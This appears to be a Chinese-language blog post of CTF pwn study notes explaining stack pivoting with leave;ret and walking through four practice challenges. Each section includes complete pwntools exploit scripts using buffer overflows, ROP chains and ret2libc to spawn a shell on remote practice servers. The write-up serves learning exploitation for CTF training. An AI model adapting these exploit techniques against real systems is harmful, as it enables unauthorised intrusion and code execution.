<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="栈迁移(第七周还没过完，就到第八周了) 什么是栈迁移:给的溢出长度不够时，换一个地方来写payload 首先考虑迁移到bss段，其次再考虑迁移到栈中 leave;ret这是栈迁移的核心函数 leave等同于mov esp ebp;pop ebp  将ebp赋值到esp，然后将栈顶的内容弹到ebp，(此时栈顶的内容就是ebp的内容，但注意，ebp的内容和ebp不同，现在是把ebp的内容赋给了ebp，">
<meta property="og:type" content="article">
<meta property="og:title" content="第八周">
<meta property="og:url" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="栈迁移(第七周还没过完，就到第八周了) 什么是栈迁移:给的溢出长度不够时，换一个地方来写payload 首先考虑迁移到bss段，其次再考虑迁移到栈中 leave;ret这是栈迁移的核心函数 leave等同于mov esp ebp;pop ebp  将ebp赋值到esp，然后将栈顶的内容弹到ebp，(此时栈顶的内容就是ebp的内容，但注意，ebp的内容和ebp不同，现在是把ebp的内容赋给了ebp，">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/2706180-20220118102850680-2070302005.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/2706180-20220118103002284-1311363088.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_11-13-48.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_11-14-35.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_13-14-08.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-22-32.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-23-29.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-24-47.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-24-47.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-25-24.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-25-31.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-26-34.png">
<meta property="og:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-11_11-47-45.png">
<meta property="article:published_time" content="2023-03-04T08:14:09.000Z">
<meta property="article:modified_time" content="2023-03-11T10:14:54.016Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/2706180-20220118102850680-2070302005.png">

<link rel="canonical" href="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>第八周 | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第八周
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-03-04 16:14:09" itemprop="dateCreated datePublished" datetime="2023-03-04T16:14:09+08:00">2023-03-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-03-11 18:14:54" itemprop="dateModified" datetime="2023-03-11T18:14:54+08:00">2023-03-11</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h2><p>(第七周还没过完，就到第八周了)</p>
<p>什么是栈迁移:给的溢出长度不够时，换一个地方来写payload</p>
<p>首先考虑迁移到bss段，其次再考虑迁移到栈中</p>
<p><code>leave;ret</code>这是栈迁移的核心函数</p>
<p><code>leave</code>等同于<code>mov esp ebp;pop ebp </code> 将ebp赋值到esp，然后将<strong>栈顶的内容</strong>弹到ebp，(此时<strong>栈顶的内容</strong>就是ebp的内容，但注意，ebp的内容和ebp不同，现在是把ebp的内容赋给了ebp，即ebp的地址变成了ebp的内容)，随着pop，esp也将要向下位移一个内存单元。</p>
<span id="more"></span>

<p><code>ret</code>等同于<code>pop eip</code>把栈顶的内容弹进了eip，也就是把esp的内容弹进eip</p>
<p><code>esp   ebp</code>这两个寄存器是栈迁移最重要的寄存器，esp是栈顶寄存器，低位，ebp是栈底寄存器，高位。</p>
<hr>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>main函数中的栈迁移，首先利用溢出把ebp的内容修改掉，改成想要迁移的地址，并且返回地址应当填充为<code>leave;ret</code>的地址，需要两次<code>leave;ret</code>。</p>
<p>第一个leave，此时<code>mov esp ebp</code>让两个指针处于同一位置，然后执行<code>pop ebp</code>。因为ebp的内容被修改掉了，所以出现了异常，ebp被弹出到了错误的地方，原本应该被弹出到ebp的内容处，现在被弹出到那个迁移的地址，esp移动一个内存单元，这时esp指向的就是被填充的<code>leave ret</code>，返回地址就变为<code>leave ret</code>。接着又执行了<code>pop edi</code>。</p>
<p>然后到了第二个<code>leave;ret</code>，先是将ebp赋给esp，也就是说此时esp移动到了ebp的位置，两个都到了被迁移后的位置。</p>
<p>接着<code>pop ebp</code>，把栈顶的内容弹给ebp，esp指向下一个内存单元，这个时候，只要把system函数的地址放到esp指定的这个地址，<code>pop eip</code>就会执行system</p>
<p>来自ZIKH26师傅</p>
<p>图解(leave打错成了level)</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/2706180-20220118102850680-2070302005.png"></p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/2706180-20220118103002284-1311363088.png"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/ZIKH26/articles/15817337.html">栈迁移的原理&amp;&amp;实战运用 - ZikH26 - 博客园 (cnblogs.com)</a></p>
<h2 id="ciscn-2019-es-2"><a href="#ciscn-2019-es-2" class="headerlink" title="ciscn_2019_es_2"></a>ciscn_2019_es_2</h2><p>这是一道经典的栈迁移</p>
<p>首先checksec<img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_11-13-48.png"></p>
<p>打开了NX保护，ida反编译，寻找漏洞</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_11-14-35.png"></p>
<p>每个read均可溢出8位，但不足以填入ROP链，所以需要栈迁移</p>
<p>第一段read，我们用来泄露ebp地址，然后通过计算偏移找到目标地址</p>
<p>第二段read来构造payload，<strong>函数在结束时会调用一次leave_ret</strong></p>
<p>然后我们将返回地址也设置为leave_ret</p>
<p>第一次leave_ret是改变ebp的值，第二次leave_ret是劫持到我们的目标地址</p>
<p><code>leave指令相当于mov esp, ebp; pop ebp，可以将ebp寄存器的值赋给esp寄存器，并将栈顶的值弹出给ebp寄存器。ret指令相当于pop eip，可以将栈顶的值弹出给eip寄存器，从而跳转到该地址执行代码。</code></p>
<p>泄露ebp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload=b&#x27;a&#x27;*27+b&#x27;b&#x27;</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(b&quot;b&quot;)</span><br><span class="line">ebp=u32(r.recv(4))</span><br></pre></td></tr></table></figure>

<p>然后，找到偏移量<img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-08_13-14-08.png"></p>
<p>f08-ed0&#x3D;0x38,偏移量为0x38</p>
<p>所以说，ebp-0x38就是s在栈上的位置</p>
<p>第二段payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">payload2 = b&#x27;aaaa&#x27; </span><br><span class="line">#栈迁移后ebp的空间</span><br><span class="line">payload2 += p32(sys_addr)</span><br><span class="line">#要执行的函数</span><br><span class="line">payload2 += p32(main_addr)</span><br><span class="line">#执行完函数的返回地址</span><br><span class="line">payload2 += p32（s+0x10）</span><br><span class="line">#一个地址，指向在栈上写入的bin_sh</span><br><span class="line">payload2 += payload2.ljust(0x28,b&#x27;a&#x27;)</span><br><span class="line">#填充满0x28位</span><br><span class="line">payload2 += p32(s) + p32(leave_ret)</span><br><span class="line">#返回地址为leave_ret，将eip劫持到s处来执行</span><br></pre></td></tr></table></figure>

<p>完整exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">r=remote(&quot;node4.buuoj.cn&quot;,25782)</span><br><span class="line">#r=process(&quot;./ciscn_2019_es_2&quot;)</span><br><span class="line">elf=ELF(&quot;./ciscn_2019_es_2&quot;)</span><br><span class="line">main=elf.symbols[&quot;main&quot;]</span><br><span class="line">sys_addr=elf.symbols[&quot;system&quot;]</span><br><span class="line">leave_ret=0x080484b8</span><br><span class="line">ret=0x080483a6</span><br><span class="line">payload=b&quot;a&quot;*0x27+b&quot;b&quot;</span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(&quot;b&quot;)</span><br><span class="line">ebp=u32(r.recv(4))</span><br><span class="line">print(hex(ebp))</span><br><span class="line">s=ebp-0x38</span><br><span class="line"></span><br><span class="line">payload=b&quot;aaaa&quot;+p32(sys_addr)+p32(0xdeadbeef)+p32(s+0x10)+b&quot;/bin/sh\x00&quot;</span><br><span class="line">payload=payload.ljust(0x28,b&quot;a&quot;)</span><br><span class="line">payload+=p32(s)+p32(leave_ret)</span><br><span class="line">r.send(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="jarvisoj-tell-me-something"><a href="#jarvisoj-tell-me-something" class="headerlink" title="jarvisoj_tell_me_something"></a>jarvisoj_tell_me_something</h2><p>其实是一道很简单的题</p>
<p>checksec发现只打开了NX保护</p>
<p>ida反编译静态分析</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-22-32.png"></p>
<p>有溢出点，足够溢出。</p>
<p>再来寻找getshell</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-23-29.png"></p>
<p>goodgame中找到，直接读取flag</p>
<p>那直接写exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">r=remote(&quot;node4.buuoj.cn&quot;,29970)</span><br><span class="line">#r=process(&quot;./guestbook&quot;)</span><br><span class="line">elf=ELF(&quot;./guestbook&quot;)</span><br><span class="line"></span><br><span class="line">shell_addr=0x400620</span><br><span class="line">payload=b&quot;a&quot;*0x88+b&quot;a&quot;*8+p64(shell_addr)</span><br><span class="line">r.recvuntil(b&quot;message:\n&quot;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>但是出错了，然后发现，<img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-24-47.png"></p>
<p>v4中无ebp!</p>
<p>又找了其他64位的来对比</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-24-47.png"></p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-25-24.png"></p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-25-31.png"></p>
<p>还找了一个32位的来对比</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-10_14-26-34.png"></p>
<p>可以看到，其他的r(推测是返回地址)是+00004&#x2F;8</p>
<p>而本题中的r是+000000，所以说exp为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">r=remote(&quot;node4.buuoj.cn&quot;,29970)</span><br><span class="line">#r=process(&quot;./guestbook&quot;)</span><br><span class="line">elf=ELF(&quot;./guestbook&quot;)</span><br><span class="line"></span><br><span class="line">shell_addr=0x400620</span><br><span class="line">payload=b&quot;a&quot;*0x88+p64(shell_addr)</span><br><span class="line">r.recvuntil(b&quot;message:\n&quot;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="pwn2-sctf-2016"><a href="#pwn2-sctf-2016" class="headerlink" title="pwn2_sctf_2016"></a>pwn2_sctf_2016</h2><p>简单的ret2libc(这次是使用LibcSearcher)</p>
<p>(如果是64位，应当选择有两个寄存器的)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import *</span><br><span class="line"></span><br><span class="line">r=remote(&quot;node4.buuoj.cn&quot;,26000)</span><br><span class="line">elf=ELF(&quot;./pwn2_sctf_2016&quot;)</span><br><span class="line"></span><br><span class="line">main_addr=elf.symbols[&quot;main&quot;]</span><br><span class="line">printf_plt=elf.plt[&quot;printf&quot;]</span><br><span class="line">printf_got=elf.got[&quot;printf&quot;]</span><br><span class="line"></span><br><span class="line">payload=flat([b&quot;a&quot;*(0x2c+4),printf_plt,main_addr,printf_got])</span><br><span class="line">r.recvuntil(b&quot;read? &quot;)</span><br><span class="line">r.sendline(&quot;-1&quot;)</span><br><span class="line">r.recvuntil(b&quot;data!\n&quot;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(&quot;\n&quot;)</span><br><span class="line">printf_addr=u32(r.recv(4))</span><br><span class="line">print(printf_addr)</span><br><span class="line">libc=LibcSearcher(&quot;printf&quot;,printf_addr)</span><br><span class="line">libc_base=printf_addr-libc.dump(&quot;printf&quot;)</span><br><span class="line">sys_addr=libc_base+libc.dump(&quot;system&quot;)</span><br><span class="line">shell_addr=libc_base+libc.dump(&quot;str_bin_sh&quot;)</span><br><span class="line">payload=flat([b&quot;a&quot;*0xc,b&quot;a&quot;*4,sys_addr,shell_addr])</span><br><span class="line">r.recvuntil(b&quot;read?&quot;)</span><br><span class="line">r.sendline(b&quot;-1&quot;)</span><br><span class="line">r.recvuntil(b&quot;data!\n&quot;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<p>很悲剧的一件事，不知道是不是年代过于久远，还是没能找到对应的libc</p>
<h2 id="HarekazeCTF2019-baby-rop2"><a href="#HarekazeCTF2019-baby-rop2" class="headerlink" title="[HarekazeCTF2019]baby_rop2"></a>[HarekazeCTF2019]baby_rop2</h2><p>依旧是一个ret2libc，但是这里他给出了libc，我们不使用puts，使用printf来泄露read的地址</p>
<p>printf有两个参数，</p>
<p><code>printf(&quot;%s&quot;,a)</code></p>
<p>根据x64的参数传递，我们需要rdi，rsi两个寄存器</p>
<p><img src="/2023/03/04/%E7%AC%AC%E5%85%AB%E5%91%A8/Snipaste_2023-03-11_11-47-45.png"></p>
<p>构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=b&quot;a&quot;*0x28+p64(pop_rdi)+p64(_s)+p64(pop_rsi)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)</span><br></pre></td></tr></table></figure>

<p>解释一下,main_addr是返回地址，printf_plt是调用的函数，那么前面两个就是它的参数了，来分别用pop_rdi,pop_rsi来弹出到栈中，_s也就是%s,直接使用了内部的</p>
<p>这次懂为什么是这样接收地址的了，接收地址的你看看基本上都是7个字节的，7f开头，补全8个字节。</p>
<p>然后是完整exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">r=remote(&quot;node4.buuoj.cn&quot;,26367)</span><br><span class="line">elf=ELF(&quot;./babyrop2&quot;)</span><br><span class="line">libc=ELF(&quot;./libc.so.6&quot;)</span><br><span class="line">pop_rdi=0x0400733</span><br><span class="line">pop_rsi=0x400731</span><br><span class="line">ret=0x04004d1</span><br><span class="line">_s=0x400770</span><br><span class="line">printf_plt=elf.plt[&quot;printf&quot;]</span><br><span class="line">read_got=elf.got[&quot;read&quot;]</span><br><span class="line">main_addr=0x400636</span><br><span class="line"></span><br><span class="line">payload=b&quot;a&quot;*0x28+p64(pop_rdi)+p64(_s)+p64(pop_rsi)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)</span><br><span class="line">r.recvuntil(&quot;name? &quot;)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">read_addr=u64(r.recvuntil(&quot;\x7f&quot;)[-6:].ljust(8,b&quot;\x00&quot;))</span><br><span class="line">print(hex(read_addr))</span><br><span class="line">libc_base=read_addr-libc.symbols[&quot;read&quot;]</span><br><span class="line">sys_addr=libc_base+libc.symbols[&quot;system&quot;]</span><br><span class="line">shell_addr=libc_base+next(libc.search(b&quot;/bin/sh&quot;))</span><br><span class="line">payload=b&quot;a&quot;*0x28+p64(pop_rdi)+p64(shell_addr)+p64(sys_addr)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/04/sql%E6%B3%A8%E5%85%A5/" rel="prev" title="sql注入">
      <i class="fa fa-chevron-left"></i> sql注入
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%88%E8%BF%81%E7%A7%BB"><span class="nav-number">1.</span> <span class="nav-text">栈迁移</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">1.0.1.</span> <span class="nav-text">原理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ciscn-2019-es-2"><span class="nav-number">2.</span> <span class="nav-text">ciscn_2019_es_2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jarvisoj-tell-me-something"><span class="nav-number">3.</span> <span class="nav-text">jarvisoj_tell_me_something</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwn2-sctf-2016"><span class="nav-number">4.</span> <span class="nav-text">pwn2_sctf_2016</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HarekazeCTF2019-baby-rop2"><span class="nav-number">5.</span> <span class="nav-text">[HarekazeCTF2019]baby_rop2</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
